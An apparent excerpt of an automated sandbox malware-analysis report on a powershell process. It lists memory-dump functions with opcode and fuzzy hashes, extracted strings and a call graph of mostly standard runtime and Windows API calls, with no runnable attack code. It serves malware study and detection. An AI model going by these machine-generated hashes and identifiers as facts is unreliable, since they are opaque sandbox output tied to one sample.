                                                                                                        Function 04B33989 Relevance: .1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cd7f75bf79bb54f2a93e2be79977e9e7404f72095499027bcafb3691de88a48c
                                                                                                        • Instruction ID: 93c6333defdd96d825253168fdeddae200f85616bbade093fda8265a4f48a14d
                                                                                                        • Opcode Fuzzy Hash: cd7f75bf79bb54f2a93e2be79977e9e7404f72095499027bcafb3691de88a48c
                                                                                                        • Instruction Fuzzy Hash: A2314A74A04645DFCB05CF99C4809AABBF1FF49310B15829AD849EB762C735EC41CBA1
                                                                                                        Function 07930C08 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8dc072de2885b3145820ca68a3b4f61e5aa26470a2594b1a244f33cf42423da9
                                                                                                        • Instruction ID: 3e2391e2199da80dc769014f8cd7f861cef6bc620c4bc75d49cd3d8a50214b47
                                                                                                        • Opcode Fuzzy Hash: 8dc072de2885b3145820ca68a3b4f61e5aa26470a2594b1a244f33cf42423da9
                                                                                                        • Instruction Fuzzy Hash: 3E01F27A31021A8BCB6459AE940057BB79FEBC262AF14C43EE54DCB241DA72C845C760
                                                                                                        Function 04B3F613 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2345391300.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4b30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 222859b4a9a5a3632f8426fe521ac407a94c339ee45cc934a7928452289a53ec
                                                                                                        • Instruction ID: 89dae872286ca716ff160cd66fb98dcc815296aae729c4343cf0c5371be9be81
                                                                                                        • Opcode Fuzzy Hash: 222859b4a9a5a3632f8426fe521ac407a94c339ee45cc934a7928452289a53ec
                                                                                                        • Instruction Fuzzy Hash: 8011B330D00149EFEF25EAA6D5987FCB772EF4932EF1414A9C001B61A4EB746889DB11
                                                                                                        Function 0793A989 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 471401ad3ff7b4ec410c94a74a6a9f76eadbe4fbc8ac19110293ceb86673e46d
                                                                                                        • Instruction ID: c1df128834ff5760303bdfa73feb271e8d90c6b6ff39ea32e00497c0dbeb5a14
                                                                                                        • Opcode Fuzzy Hash: 471401ad3ff7b4ec410c94a74a6a9f76eadbe4fbc8ac19110293ceb86673e46d
                                                                                                        • Instruction Fuzzy Hash: AD0126F2B400605BC62A126C0D1266D3B12CFE275CB0244BAEA41AF746CA7D5D4287E3
                                                                                                        Function 079333A4 Relevance: .0, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a4350638a5e5d8509b758763ba49a9fc4a9eb92cf6ba4abd287254f3003abbb
                                                                                                        • Instruction ID: 42d33f098b7b2bf3ed13b68324fa24973b0e67670ca4793c4d66c04a2d564c16
                                                                                                        • Opcode Fuzzy Hash: 7a4350638a5e5d8509b758763ba49a9fc4a9eb92cf6ba4abd287254f3003abbb
                                                                                                        • Instruction Fuzzy Hash: 3DE06D70249241DFD311DB04C884A15BB76AF82208F5CC1DAD4088F16BCB7AD846C751

                                                                                                        Non-executed Functions

                                                                                                        Function 0793D160 Relevance: 11.5, Strings: 9, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$d%kq$d%kq$d%kq$d%kq$tPeq$tPeq$$eq
                                                                                                        • API String ID: 0-1685596849
                                                                                                        • Opcode ID: 5417f039606c59d5cef9ac8ce42f615e8bd3033739ad605a9fca4cb20b663e3e
                                                                                                        • Instruction ID: 536915a66eee61de05be365a00201cf55a5896598e6a35bd59b5cb8c6a545b91
                                                                                                        • Opcode Fuzzy Hash: 5417f039606c59d5cef9ac8ce42f615e8bd3033739ad605a9fca4cb20b663e3e
                                                                                                        • Instruction Fuzzy Hash: BA613AB1B00255DFDB259F68C824A7EBBA6AF85318F14849AE9018B3D5CB35EC01C7A1
                                                                                                        Function 07938AD9 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-723692213
                                                                                                        • Opcode ID: 756b1cbc65c9616caa2a5acc4e0081bd1ade7f703974cd239ac2dc5f0dff2b94
                                                                                                        • Instruction ID: 4248d04d358c5615398a55ae014e220f0f18c26583b1edcfa9d9d8570133ec85
                                                                                                        • Opcode Fuzzy Hash: 756b1cbc65c9616caa2a5acc4e0081bd1ade7f703974cd239ac2dc5f0dff2b94
                                                                                                        • Instruction Fuzzy Hash: C95105F1B05206DFDB258F64C451AABBBB6EF85318F24C46AF4069B285CB71D841CB62
                                                                                                        Function 0793D9E3 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$tPeq$tPeq$$eq$(kq$(kq$(kq
                                                                                                        • API String ID: 0-739703263
                                                                                                        • Opcode ID: 907dd09f235692e57e98a24914a2915a3d97b3f4e081c51e8e53d9b6e98e013a
                                                                                                        • Instruction ID: 7906fc288711d8d909658566f1818063031677832d4d81e4242d63e5baf54dbd
                                                                                                        • Opcode Fuzzy Hash: 907dd09f235692e57e98a24914a2915a3d97b3f4e081c51e8e53d9b6e98e013a
                                                                                                        • Instruction Fuzzy Hash: 2271F5B0B14205DFCB24CE55C560BAABBFAFF45318F198459E814AB381C771DD80CBA1
                                                                                                        Function 0793D1A5 Relevance: 7.7, Strings: 6, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$d%kq$d%kq$d%kq$tPeq$$eq
                                                                                                        • API String ID: 0-1075972722
                                                                                                        • Opcode ID: 5bbd03e4bf2c371fcd1e9625f9329ef071199fc0bb80fbe07c4f7ce74d76959d
                                                                                                        • Instruction ID: ad3cd97b20ed65c08e204ada9cc5398c3b8a1bd2c3fa71e2476b037456017f82
                                                                                                        • Opcode Fuzzy Hash: 5bbd03e4bf2c371fcd1e9625f9329ef071199fc0bb80fbe07c4f7ce74d76959d
                                                                                                        • Instruction Fuzzy Hash: B451D4F5B04202DFDB248F65C564B7ABBA6AF4531CF1884A5E8019B2D5C735ED40CBA2
                                                                                                        Function 07932060 Relevance: 7.6, Strings: 6, Instructions: 138COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$t~xq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-2866196260
                                                                                                        • Opcode ID: 45833e28670699d745367abfee71892156a905d191978f2d54b013dfa31e660b
                                                                                                        • Instruction ID: 894e6762057d1eea6366f834826c27496f8591ec82b37be12447d3a98517a94f
                                                                                                        • Opcode Fuzzy Hash: 45833e28670699d745367abfee71892156a905d191978f2d54b013dfa31e660b
                                                                                                        • Instruction Fuzzy Hash: D94147B6700217CBDB259BA9891027BBBA7BFC5218F24846AD542CF292DF35C985C353
                                                                                                        Function 07938D68 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-220072568
                                                                                                        • Opcode ID: c42fe84dc1719dbdece07885229e19b477b2ec336d458f9c97db6ef819ac5a47
                                                                                                        • Instruction ID: 23673fdc4a5dcdff9d9bac5b72df9561401921c354e0d36580751925e5add6b7
                                                                                                        • Opcode Fuzzy Hash: c42fe84dc1719dbdece07885229e19b477b2ec336d458f9c97db6ef819ac5a47
                                                                                                        • Instruction Fuzzy Hash: 8E3159B67042038BDB355A65880097BB7A6ABE1218B28497FE052CB245DE39C841C372
                                                                                                        Function 0793D4EC Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-2942138008
                                                                                                        • Opcode ID: 1b771003eb21b08d955ab0df5612e38525cb48e1cb4e6426224789d65227e4ff
                                                                                                        • Instruction ID: d61209699c016ce7e84df611a2168ede2538e5eb9115f01c77f812b9505dc2a8
                                                                                                        • Opcode Fuzzy Hash: 1b771003eb21b08d955ab0df5612e38525cb48e1cb4e6426224789d65227e4ff
                                                                                                        • Instruction Fuzzy Hash: E0418AF6704617CFDF228E29842027BBBAAAFD212CB24407BD465C7189CF35C842C762
                                                                                                        Function 079344F5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-2942138008
                                                                                                        • Opcode ID: 54e8d24fa0054bc30fe3102822acf6c4a5a17d6a19f17217936020e91d3c1bc9
                                                                                                        • Instruction ID: e83321f1d0dbbdc8795fe81646ece62c38c651992f961db45356cfc0e12a152e
                                                                                                        • Opcode Fuzzy Hash: 54e8d24fa0054bc30fe3102822acf6c4a5a17d6a19f17217936020e91d3c1bc9
                                                                                                        • Instruction Fuzzy Hash: C33127F6B04296CFCF254E65940027BBBA6EF91219B2A84BFDC01CB2A5DF35C451C792
                                                                                                        Function 0793D2A6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$d%kq$d%kq$d%kq$tPeq
                                                                                                        • API String ID: 0-989600758
                                                                                                        • Opcode ID: f7726b12d1e834abe7d4e61afd2ac349834a4409b758bc2b74f4266acc25953f
                                                                                                        • Instruction ID: 4d28c50e880b65928c614e825f2b6f99d0d02e9530e7419dc5f88b7c7d049028
                                                                                                        • Opcode Fuzzy Hash: f7726b12d1e834abe7d4e61afd2ac349834a4409b758bc2b74f4266acc25953f
                                                                                                        • Instruction Fuzzy Hash: FF31BFB5B00215DFCB24DF58C464A6EFBA6BB88718F24C499E805AB381C731EC01CB91
                                                                                                        Function 0793E720 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$x.k$-k
                                                                                                        • API String ID: 0-2411186623
                                                                                                        • Opcode ID: 700bf1960e31967e854c005eb3b76fcde0b533eda68d538a8b7ac9f7e46a5735
                                                                                                        • Instruction ID: a61e739240b0cbd2e5f18f8f52c72c8aa5e436259c6e3224cf3d9107adeb1584
                                                                                                        • Opcode Fuzzy Hash: 700bf1960e31967e854c005eb3b76fcde0b533eda68d538a8b7ac9f7e46a5735
                                                                                                        • Instruction Fuzzy Hash: 02C18CB4A00205DFDB24DF54C541B6EBBB6EF88718F148429E9067B785CB75EC428B92
                                                                                                        Function 0793E478 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XRjq$XRjq$tPeq$$eq
                                                                                                        • API String ID: 0-916665797
                                                                                                        • Opcode ID: 09f8549b4e16e28551a8e60679e3f4dbbd491b45150d00d0555c4667df206fb0
                                                                                                        • Instruction ID: 9c8be7d14225a449565cc2b5c6958cfd8c4a6a11b03acadc79af071585c12d49
                                                                                                        • Opcode Fuzzy Hash: 09f8549b4e16e28551a8e60679e3f4dbbd491b45150d00d0555c4667df206fb0
                                                                                                        • Instruction Fuzzy Hash: DE41AFB4A00206DFDF24CF59C148BAAB7F6AB8971CF19C4AAE4056B294C771ED41CB91
                                                                                                        Function 07931150 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-812946093
                                                                                                        • Opcode ID: fac0aac07c750997e26ad8747ec8a363d7ce0e990b132abdff27364fe98d2e5d
                                                                                                        • Instruction ID: cb332df06e1ac67db32abb54c8d8f25c1b3ffd02e832a3e2b066407d02a035a5
                                                                                                        • Opcode Fuzzy Hash: fac0aac07c750997e26ad8747ec8a363d7ce0e990b132abdff27364fe98d2e5d
                                                                                                        • Instruction Fuzzy Hash: FD2188B175470A9BDB34D5AA9800B67BBDA9BC1719F24843AA406CB3A1DD76C841C321
                                                                                                        Function 0793292F Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq
                                                                                                        • API String ID: 0-3287427201
                                                                                                        • Opcode ID: b5fd96d20f74aaa335a3fa89d89c0234c98ba03ca5864b87b34da2cc1dbd5580
                                                                                                        • Instruction ID: 4de81ceec84a2c9275470bff42e98f89e252e919a0815b05f8294f65f6459c0f
                                                                                                        • Opcode Fuzzy Hash: b5fd96d20f74aaa335a3fa89d89c0234c98ba03ca5864b87b34da2cc1dbd5580
                                                                                                        • Instruction Fuzzy Hash: BD1148B17142158FDB29DF18DA81A267BF9FF0A13836401AFC151CF2A7C7218801C7D2
                                                                                                        Function 07931E48 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq
                                                                                                        • API String ID: 0-3287427201
                                                                                                        • Opcode ID: 20f972b5b9c49e8feb4484a1db4cace56283fb61d0fed8bcf65e57ae1084e3eb
                                                                                                        • Instruction ID: f8166ed65c1b6f1113a26564ecfb4d77ee9635c84098ff32950ba5e4d5d993a5
                                                                                                        • Opcode Fuzzy Hash: 20f972b5b9c49e8feb4484a1db4cace56283fb61d0fed8bcf65e57ae1084e3eb
                                                                                                        • Instruction Fuzzy Hash: C601D87175D7DA8FC3375228182006A7F729FC355431905D7D041CF2A7CA2A4D4A83A3

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:2.7%
                                                                                                        Total number of Nodes:1658
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 7251 228e724e GetProcessHeap 7252 228e284f 7253 228e2882 std::exception::exception 27 API calls 7252->7253 7254 228e285d 7253->7254 7057 228e220c 7058 228e221a dllmain_dispatch 7057->7058 7059 228e2215 7057->7059 7061 228e22b1 7059->7061 7062 228e22c7 7061->7062 7064 228e22d0 7062->7064 7065 228e2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7062->7065 7064->7058 7065->7064 5989 228e508a 5990 228e509c 5989->5990 5991 228e50a2 5989->5991 5993 228e5000 5990->5993 5997 228e500d 5993->5997 5998 228e502a 5993->5998 5994 228e5024 5996 228e571e _free 20 API calls 5994->5996 5995 228e571e _free 20 API calls 5995->5997 5996->5998 5997->5994 5997->5995 5998->5991 7255 228e5348 7256 228e3529 ___vcrt_uninitialize 8 API calls 7255->7256 7257 228e534f 7256->7257 7258 228e7b48 7268 228e8ebf 7258->7268 7262 228e7b55 7281 228e907c 7262->7281 7265 228e7b7f 7266 228e571e _free 20 API calls 7265->7266 7267 228e7b8a 7266->7267 7285 228e8ec8 7268->7285 7270 228e7b50 7271 228e8fdc 7270->7271 7272 228e8fe8 ___DestructExceptionObject 7271->7272 7305 228e5671 RtlEnterCriticalSection 7272->7305 7274 228e905e 7319 228e9073 7274->7319 7275 228e8ff3 7275->7274 7277 228e9032 RtlDeleteCriticalSection 7275->7277 7306 228ea09c 7275->7306 7280 228e571e _free 20 API calls 7277->7280 7278 228e906a _abort 7278->7262 7280->7275 7282 228e7b64 RtlDeleteCriticalSection 7281->7282 7283 228e9092 7281->7283 7282->7262 7282->7265 7283->7282 7284 228e571e _free 20 API calls 7283->7284 7284->7282 7286 228e8ed4 ___DestructExceptionObject 7285->7286 7295 228e5671 RtlEnterCriticalSection 7286->7295 7288 228e8f77 7300 228e8f97 7288->7300 7292 228e8ee3 7292->7288 7294 228e8e78 66 API calls 7292->7294 7296 228e7b94 RtlEnterCriticalSection 7292->7296 7297 228e8f6d 7292->7297 7293 228e8f83 _abort 7293->7270 7294->7292 7295->7292 7296->7292 7303 228e7ba8 RtlLeaveCriticalSection 7297->7303 7299 228e8f75 7299->7292 7304 228e56b9 RtlLeaveCriticalSection 7300->7304 7302 228e8f9e 7302->7293 7303->7299 7304->7302 7305->7275 7307 228ea0a8 ___DestructExceptionObject 7306->7307 7308 228ea0ce 7307->7308 7309 228ea0b9 7307->7309 7311 228ea0c9 _abort 7308->7311 7322 228e7b94 RtlEnterCriticalSection 7308->7322 7310 228e6368 _free 20 API calls 7309->7310 7313 228ea0be 7310->7313 7311->7275 7315 228e62ac _abort 26 API calls 7313->7315 7314 228ea0ea 7323 228ea026 7314->7323 7315->7311 7317 228ea0f5 7339 228ea112 7317->7339 7587 228e56b9 RtlLeaveCriticalSection 7319->7587 7321 228e907a 7321->7278 7322->7314 7324 228ea048 7323->7324 7325 228ea033 7323->7325 7331 228ea043 7324->7331 7342 228e8e12 7324->7342 7326 228e6368 _free 20 API calls 7325->7326 7328 228ea038 7326->7328 7330 228e62ac _abort 26 API calls 7328->7330 7330->7331 7331->7317 7332 228e907c 20 API calls 7333 228ea064 7332->7333 7348 228e7a5a 7333->7348 7335 228ea06a 7355 228eadce 7335->7355 7338 228e571e _free 20 API calls 7338->7331 7586 228e7ba8 RtlLeaveCriticalSection 7339->7586 7341 228ea11a 7341->7311 7343 228e8e2a 7342->7343 7347 228e8e26 7342->7347 7344 228e7a5a 26 API calls 7343->7344 7343->7347 7345 228e8e4a 7344->7345 7370 228e9a22 7345->7370 7347->7332 7349 228e7a7b 7348->7349 7350 228e7a66 7348->7350 7349->7335 7351 228e6368 _free 20 API calls 7350->7351 7352 228e7a6b 7351->7352 7353 228e62ac _abort 26 API calls 7352->7353 7354 228e7a76 7353->7354 7354->7335 7356 228eaddd 7355->7356 7361 228eadf2 7355->7361 7357 228e6355 __dosmaperr 20 API calls 7356->7357 7360 228eade2 7357->7360 7358 228eae2d 7359 228e6355 __dosmaperr 20 API calls 7358->7359 7362 228eae32 7359->7362 7363 228e6368 _free 20 API calls 7360->7363 7361->7358 7364 228eae19 7361->7364 7365 228e6368 _free 20 API calls 7362->7365 7368 228ea070 7363->7368 7543 228eada6 7364->7543 7367 228eae3a 7365->7367 7369 228e62ac _abort 26 API calls 7367->7369 7368->7331 7368->7338 7369->7368 7371 228e9a2e ___DestructExceptionObject 7370->7371 7372 228e9a4e 7371->7372 7373 228e9a36 7371->7373 7375 228e9aec 7372->7375 7380 228e9a83 7372->7380 7395 228e6355 7373->7395 7377 228e6355 __dosmaperr 20 API calls 7375->7377 7379 228e9af1 7377->7379 7378 228e6368 _free 20 API calls 7381 228e9a43 _abort 7378->7381 7382 228e6368 _free 20 API calls 7379->7382 7398 228e8c7b RtlEnterCriticalSection 7380->7398 7381->7347 7384 228e9af9 7382->7384 7386 228e62ac _abort 26 API calls 7384->7386 7385 228e9a89 7387 228e9aba 7385->7387 7388 228e9aa5 7385->7388 7386->7381 7399 228e9b0d 7387->7399 7389 228e6368 _free 20 API calls 7388->7389 7391 228e9aaa 7389->7391 7392 228e6355 __dosmaperr 20 API calls 7391->7392 7393 228e9ab5 7392->7393 7450 228e9ae4 7393->7450 7396 228e5b7a __dosmaperr 20 API calls 7395->7396 7397 228e635a 7396->7397 7397->7378 7398->7385 7400 228e9b3b 7399->7400 7438 228e9b34 7399->7438 7401 228e9b5e 7400->7401 7402 228e9b3f 7400->7402 7405 228e9baf 7401->7405 7406 228e9b92 7401->7406 7404 228e6355 __dosmaperr 20 API calls 7402->7404 7403 228e2ada _ValidateLocalCookies 5 API calls 7407 228e9d15 7403->7407 7408 228e9b44 7404->7408 7410 228e9bc5 7405->7410 7453 228ea00b 7405->7453 7409 228e6355 __dosmaperr 20 API calls 7406->7409 7407->7393 7411 228e6368 _free 20 API calls 7408->7411 7413 228e9b97 7409->7413 7456 228e96b2 7410->7456 7415 228e9b4b 7411->7415 7417 228e6368 _free 20 API calls 7413->7417 7418 228e62ac _abort 26 API calls 7415->7418 7421 228e9b9f 7417->7421 7418->7438 7419 228e9c0c 7425 228e9c66 WriteFile 7419->7425 7426 228e9c20 7419->7426 7420 228e9bd3 7422 228e9bf9 7420->7422 7423 228e9bd7 7420->7423 7424 228e62ac _abort 26 API calls 7421->7424 7468 228e9492 GetConsoleCP 7422->7468 7427 228e9ccd 7423->7427 7463 228e9645 7423->7463 7424->7438 7429 228e9c89 GetLastError 7425->7429 7434 228e9bef 7425->7434 7430 228e9c28 7426->7430 7431 228e9c56 7426->7431 7427->7438 7439 228e6368 _free 20 API calls 7427->7439 7429->7434 7435 228e9c2d 7430->7435 7436 228e9c46 7430->7436 7494 228e9728 7431->7494 7434->7427 7434->7438 7442 228e9ca9 7434->7442 7435->7427 7479 228e9807 7435->7479 7486 228e98f5 7436->7486 7438->7403 7441 228e9cf2 7439->7441 7443 228e6355 __dosmaperr 20 API calls 7441->7443 7444 228e9cc4 7442->7444 7445 228e9cb0 7442->7445 7443->7438 7501 228e6332 7444->7501 7447 228e6368 _free 20 API calls 7445->7447 7448 228e9cb5 7447->7448 7449 228e6355 __dosmaperr 20 API calls 7448->7449 7449->7438 7542 228e8c9e RtlLeaveCriticalSection 7450->7542 7452 228e9aea 7452->7381 7506 228e9f8d 7453->7506 7528 228e8dbc 7456->7528 7458 228e96c2 7459 228e5af6 _abort 38 API calls 7458->7459 7460 228e96c7 7458->7460 7461 228e96ea 7459->7461 7460->7419 7460->7420 7461->7460 7462 228e9708 GetConsoleMode 7461->7462 7462->7460 7464 228e966a 7463->7464 7466 228e969f 7463->7466 7465 228e96a1 GetLastError 7464->7465 7464->7466 7467 228ea181 WriteConsoleW CreateFileW 7464->7467 7465->7466 7466->7434 7467->7464 7469 228e9607 7468->7469 7473 228e94f5 7468->7473 7470 228e2ada _ValidateLocalCookies 5 API calls 7469->7470 7471 228e9641 7470->7471 7471->7434 7473->7469 7474 228e957b WideCharToMultiByte 7473->7474 7476 228e79e6 40 API calls __fassign 7473->7476 7478 228e95d2 WriteFile 7473->7478 7537 228e7c19 7473->7537 7474->7469 7475 228e95a1 WriteFile 7474->7475 7475->7473 7477 228e962a GetLastError 7475->7477 7476->7473 7477->7469 7478->7473 7478->7477 7480 228e9816 7479->7480 7481 228e98d8 7480->7481 7482 228e9894 WriteFile 7480->7482 7483 228e2ada _ValidateLocalCookies 5 API calls 7481->7483 7482->7480 7484 228e98da GetLastError 7482->7484 7485 228e98f1 7483->7485 7484->7481 7485->7434 7493 228e9904 7486->7493 7487 228e9a0f 7488 228e2ada _ValidateLocalCookies 5 API calls 7487->7488 7489 228e9a1e 7488->7489 7489->7434 7490 228e9986 WideCharToMultiByte 7491 228e99bb WriteFile 7490->7491 7492 228e9a07 GetLastError 7490->7492 7491->7492 7491->7493 7492->7487 7493->7487 7493->7490 7493->7491 7499 228e9737 7494->7499 7495 228e97ea 7496 228e2ada _ValidateLocalCookies 5 API calls 7495->7496 7498 228e9803 7496->7498 7497 228e97a9 WriteFile 7497->7499 7500 228e97ec GetLastError 7497->7500 7498->7434 